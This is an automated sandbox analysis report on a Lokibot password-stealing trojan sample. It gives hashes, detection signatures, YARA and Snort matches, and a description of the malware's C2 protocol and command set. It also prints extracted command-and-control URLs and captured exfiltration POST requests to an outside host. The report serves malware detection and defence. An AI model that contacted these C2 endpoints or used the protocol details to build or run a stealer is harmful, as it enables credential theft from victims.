Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lqoUUYTMsL.exe

Overview

General Information

Sample name:lqoUUYTMsL.exe
renamed because original name is a hash value
Original sample name:3113c2a7b30c1cb350e8950b4222b0c4.exe
Analysis ID:1428426
MD5:3113c2a7b30c1cb350e8950b4222b0c4
SHA1:2fe0c50dd095a738788693e147c0b9d883554d2c
SHA256:7ff1d7dd5684cd38bea4a227bf49d4ceff1de7d2f66a556ccc6ce1a382640fc6
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • lqoUUYTMsL.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\lqoUUYTMsL.exe" MD5: 3113C2A7B30C1CB350E8950B4222B0C4)
    • lqoUUYTMsL.exe (PID: 6464 cmdline: C:\Users\user\Desktop\lqoUUYTMsL.exe MD5: 3113C2A7B30C1CB350E8950B4222B0C4)
    • lqoUUYTMsL.exe (PID: 6408 cmdline: C:\Users\user\Desktop\lqoUUYTMsL.exe MD5: 3113C2A7B30C1CB350E8950B4222B0C4)
    • lqoUUYTMsL.exe (PID: 5352 cmdline: C:\Users\user\Desktop\lqoUUYTMsL.exe MD5: 3113C2A7B30C1CB350E8950B4222B0C4)
    • lqoUUYTMsL.exe (PID: 5088 cmdline: C:\Users\user\Desktop\lqoUUYTMsL.exe MD5: 3113C2A7B30C1CB350E8950B4222B0C4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://tequilacofradiamx.com/minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x17900:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x4ccb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 41 entries
          SourceRuleDescriptionAuthorStrings
          0.2.lqoUUYTMsL.exe.6a83510.4.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            0.2.lqoUUYTMsL.exe.6a83510.4.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            0.2.lqoUUYTMsL.exe.6a83510.4.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            0.2.lqoUUYTMsL.exe.6a83510.4.unpackLoki_1Loki Payloadkevoreilly
            • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x133fc:$a2: last_compatible_version
            0.2.lqoUUYTMsL.exe.6a83510.4.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x123ff:$des3: 68 03 66 00 00
            • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            Click to see the 24 entries
            No Sigma rule has matched
            Timestamp:04/18/24-23:01:56.652272
            SID:2024317
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:58.789410
            SID:2024318
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:56.652272
            SID:2021641
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:58.045440
            SID:2024313
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:58.045440
            SID:2021641
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:58.045440
            SID:2825766
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:58.045440
            SID:2025381
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:57.372627
            SID:2021641
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:57.372627
            SID:2024317
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:57.372627
            SID:2825766
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:57.372627
            SID:2024312
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:58.789410
            SID:2025381
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:56.652272
            SID:2025381
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:56.652272
            SID:2825766
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:56.652272
            SID:2024312
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:57.372627
            SID:2025381
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:58.045440
            SID:2024318
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:58.789410
            SID:2024313
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:58.789410
            SID:2021641
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/18/24-23:01:58.789410
            SID:2825766
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: lqoUUYTMsL.exeAvira: detected
            Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
            Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
            Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
            Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
            Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://tequilacofradiamx.com/minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php"]}
            Source: lqoUUYTMsL.exeReversingLabs: Detection: 79%
            Source: lqoUUYTMsL.exeJoe Sandbox ML: detected
            Source: lqoUUYTMsL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
            Source: lqoUUYTMsL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49730 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49730 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49730 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49730 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49730 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49731 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49731 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49731 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49731 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49731 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49732 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49732 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49732 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49732 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49732 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49733 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49733 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49733 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49733 -> 91.92.253.228:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49733 -> 91.92.253.228:80
            Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
            Source: Malware configuration extractorURLs: https://tequilacofradiamx.com/minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php
            Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
            Source: global trafficHTTP traffic detected: POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tequilacofradiamx.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D0B62332Content-Length: 176Connection: close
            Source: global trafficHTTP traffic detected: POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tequilacofradiamx.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D0B62332Content-Length: 176Connection: close
            Source: global trafficHTTP traffic detected: POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tequilacofradiamx.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D0B62332Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tequilacofradiamx.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D0B62332Content-Length: 149Connection: close
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
            Source: unknownDNS traffic detected: queries for: tequilacofradiamx.com
            Source: unknownHTTP traffic detected: POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tequilacofradiamx.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D0B62332Content-Length: 176Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 21:01:57 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Wed, 17 Apr 2024 06:00:48 GMTETag: "6164b-587-616449379118c"Accept-Ranges: bytesContent-Length: 1415Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 21:01:58 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Wed, 17 Apr 2024 06:00:48 GMTETag: "6164b-587-616449379118c"Accept-Ranges: bytesContent-Length: 1415Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 21:01:58 GMTServer: Apache/2.2.15 (CentOS)Last-Modified: Wed, 17 Apr 2024 06:00:48 GMTETag: "6164b-587-616449379118c"Accept-Ranges: bytesContent-Length: 1415Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 